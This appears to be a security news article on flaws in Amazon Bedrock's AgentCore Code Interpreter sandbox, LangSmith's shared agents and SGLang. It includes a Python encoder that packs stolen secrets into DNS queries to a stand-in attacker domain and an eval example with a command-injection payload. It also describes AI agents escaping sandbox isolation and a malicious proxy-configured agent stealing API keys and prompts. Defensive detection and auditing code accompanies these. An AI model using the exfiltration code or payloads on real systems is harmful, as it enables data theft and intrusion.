Critical AI Vulnerabilities in Amazon Bedrock, LangSmith, and SGLang Expose Systems to Data Breaches and Remote Code Execution
Recent cybersecurity research has disclosed significant vulnerabilities in prominent artificial intelligence (AI) platforms, including Amazon Bedrock’s AgentCore Code Interpreter, LangSmith, and SGLang. These flaws could allow attackers to exfiltrate sensitive data and execute remote code, posing substantial risks to organizations that rely on these services.
Amazon Bedrock’s AgentCore Code Interpreter Vulnerability
Amazon Bedrock’s AgentCore Code Interpreter is designed to let AI agents execute code within isolated sandbox environments, ensuring that agentic workloads cannot access external systems. However, researchers at BeyondTrust have identified a critical flaw in this sandbox mode: it permits outbound Domain Name System (DNS) queries. Attackers can exploit this loophole to establish command-and-control channels and exfiltrate data, effectively bypassing the intended network isolation.
In a detailed report, BeyondTrust demonstrated how threat actors could set up bidirectional communication channels using DNS queries and responses. This method allows for interactive reverse shells, data exfiltration, and command execution. The vulnerability is particularly concerning because it undermines the network isolation guarantees of sandboxed code interpreters, potentially leading to data breaches and system compromises.
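The DNS tunneling technique described above works because arbitrary data can be packed into query names. The following sketch (not BeyondTrust’s actual tooling; the domain and payload are illustrative) shows how an attacker-side encoder might split stolen bytes into DNS-safe labels under a domain the attacker controls:

```python
import base64

# Hypothetical attacker-controlled domain (illustrative only).
C2_DOMAIN = "exfil.example.com"
MAX_LABEL = 63  # DNS limits each label to 63 bytes

def encode_exfil_queries(data: bytes) -> list[str]:
    """Split stolen data into DNS-safe chunks, one query name per chunk."""
    # Base32 keeps the payload within the DNS hostname character set.
    payload = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [payload[i:i + MAX_LABEL]
              for i in range(0, len(payload), MAX_LABEL)]
    # A sequence-number label lets the receiver reassemble chunks in order.
    return [f"{seq}.{chunk}.{C2_DOMAIN}" for seq, chunk in enumerate(chunks)]

queries = encode_exfil_queries(b"AWS_SECRET_ACCESS_KEY=...")
```

Each resulting name fits DNS limits, and an authoritative name server for the attacker’s domain can reassemble the chunks by sequence number; DNS responses can carry commands back the same way, which is what makes the channel bidirectional.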
Following responsible disclosure in September 2025, Amazon acknowledged the issue but classified it as intended functionality rather than a defect. The company recommends that customers use Virtual Private Cloud (VPC) mode instead of sandbox mode for complete network isolation. Additionally, Amazon advises implementing DNS firewalls to filter outbound DNS traffic, thereby mitigating potential exploitation.
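DNS filtering can catch this pattern because tunneled payloads look statistically different from ordinary hostnames. The heuristic below is a generic sketch of the kind of rule a DNS firewall or monitoring tool might apply, not an AWS feature; the thresholds are illustrative:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in the string."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def is_suspicious_query(qname: str, max_label: int = 40,
                        entropy_threshold: float = 3.5) -> bool:
    """Flag query names whose subdomain labels look like encoded payloads."""
    labels = qname.rstrip(".").split(".")
    for label in labels[:-2]:  # ignore the registered domain and TLD
        if len(label) > max_label:          # unusually long label
            return True
        if len(label) >= 12 and shannon_entropy(label) > entropy_threshold:
            return True                     # high-entropy (encoded) label
    return False
```

In practice such heuristics are tuned against a baseline of legitimate traffic, since some CDN and telemetry hostnames also use long, random-looking labels.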
LangSmith’s Account Takeover Flaw
LangSmith, an observability and evaluation platform for developing and monitoring large language model (LLM) applications, has also been found to contain a significant security flaw. Researchers at Miggo Security discovered that maliciously configured agents shared through the platform could be used to gain unauthorized access to user accounts. The vulnerability allows attackers to intercept API keys and user prompts, leading to potential data breaches and unauthorized actions within the platform.
The flaw, codenamed AgentSmith, carries a Common Vulnerability Scoring System (CVSS) score of 8.8 out of 10, indicating high severity. The vulnerability was identified in the LangChain Hub, a repository for publicly listed prompts, agents, and models. An attacker could upload to the Prompt Hub an agent pre-configured with a malicious proxy server; any user who adopted that agent would then unknowingly route all of their communications, including sensitive data, through attacker-controlled infrastructure.
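One practical defense against this class of supply-chain attack is to inspect any agent configuration pulled from a public hub before adopting it. The sketch below assumes a generic JSON-style configuration; the traversal logic and the allowlisted hosts are illustrative assumptions, not LangSmith’s actual schema:

```python
from urllib.parse import urlparse

# Example allowlist of API hosts the agent is expected to talk to.
TRUSTED_API_HOSTS = {"api.openai.com", "api.anthropic.com"}

def find_untrusted_endpoints(config: dict) -> list[str]:
    """Recursively flag any URL-valued setting pointing outside the allowlist."""
    suspicious: list[str] = []

    def walk(node, path: str = "") -> None:
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")
        elif isinstance(node, str) and node.startswith(("http://", "https://")):
            host = urlparse(node).hostname or ""
            if host not in TRUSTED_API_HOSTS:
                suspicious.append(f"{path} -> {node}")

    walk(config)
    return suspicious
```

A check like this would have surfaced a pre-configured proxy endpoint (for example, a `base_url` override pointing at an unfamiliar host) before any API key or prompt was ever sent through it.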
LangSmith has since patched the vulnerability and recommends that users update their systems to the latest version to mitigate potential risks. Users are also advised to review their account settings and monitor for any unauthorized activities.
SGLang’s Remote Code Execution Vulnerability
SGLang, an open-source framework for serving large language models, has been found to contain a vulnerability that could allow remote code execution (RCE). The flaw resides in the framework’s code execution environment, where insufficient input validation permits attackers to execute arbitrary code. This poses a significant risk, as it could lead to unauthorized access, data breaches, and system compromise.
Security researchers have demonstrated how an attacker could craft malicious inputs that, when processed by SGLang, execute unintended commands. This exploitation could result in the installation of malware, data exfiltration, or further network penetration.
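Public details of the SGLang flaw are limited, but the underlying bug class — evaluating insufficiently validated input — is well understood. The sketch below contrasts the dangerous pattern with a restrictive validator; it illustrates the class of vulnerability, not SGLang’s actual code:

```python
import ast

def unsafe_render(template: str, params: dict) -> str:
    # Anti-pattern: evaluating attacker-controlled input directly.
    # A payload like "__import__('os').system('id')" runs arbitrary commands.
    return str(eval(template, {}, params))  # shown only to illustrate the bug

def safe_render(template: str, params: dict) -> str:
    # Restrictive alternative: accept only Python literals or known
    # parameter names; everything else is rejected outright.
    try:
        return str(ast.literal_eval(template))
    except (ValueError, SyntaxError):
        if template.isidentifier() and template in params:
            return str(params[template])
        raise ValueError(f"rejected untrusted input: {template!r}")
```

The key design choice is an allowlist: instead of trying to blocklist dangerous constructs, the validator accepts only the narrow set of inputs the application actually needs and refuses everything else.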
SGLang has acknowledged the issue and released a security update to address the vulnerability. Users are strongly encouraged to apply the update promptly and review their systems for any signs of compromise.
Mitigation Strategies and Recommendations
To protect against these vulnerabilities, organizations should implement the following strategies:
1. Update and Patch Systems: Ensure that all AI platforms and associated software are updated to the latest versions that include security patches for known vulnerabilities.
2. Implement Network Isolation: Utilize VPC modes and configure network settings to enforce strict isolation, preventing unauthorized access and data exfiltration.
3. Monitor DNS Traffic: Deploy DNS firewalls and monitoring tools to detect and block suspicious DNS queries that could indicate command-and-control communications or data exfiltration attempts.
4. Review IAM Roles and Permissions: Conduct regular audits of Identity and Access Management (IAM) roles to ensure they adhere to the principle of least privilege, minimizing the potential impact of a compromised account.
5. Conduct Security Audits: Regularly perform comprehensive security assessments of AI platforms to identify and remediate potential vulnerabilities before they can be exploited.
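As a concrete example of the least-privilege audit in step 4, a simple static check can flag IAM policy statements that grant wildcard permissions. This is an illustrative linter sketch, not an AWS tool, and real audits should also consider conditions and resource-level permissions:

```python
import json

def find_overbroad_statements(policy_json: str) -> list[dict]:
    """Flag Allow statements that use wildcards in Action or Resource."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may appear unwrapped
        statements = [statements]
    flagged = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        # "s3:*" grants every action in a service; "*" grants everything.
        if any(a == "*" or a.endswith(":*") for a in actions) or "*" in resources:
            flagged.append(stmt)
    return flagged
```

Running a check like this across the roles attached to AI workloads helps bound the blast radius if an agent or its credentials are ever compromised.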
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can mitigate the risks associated with AI platform flaws and safeguard their systems and data against potential attacks.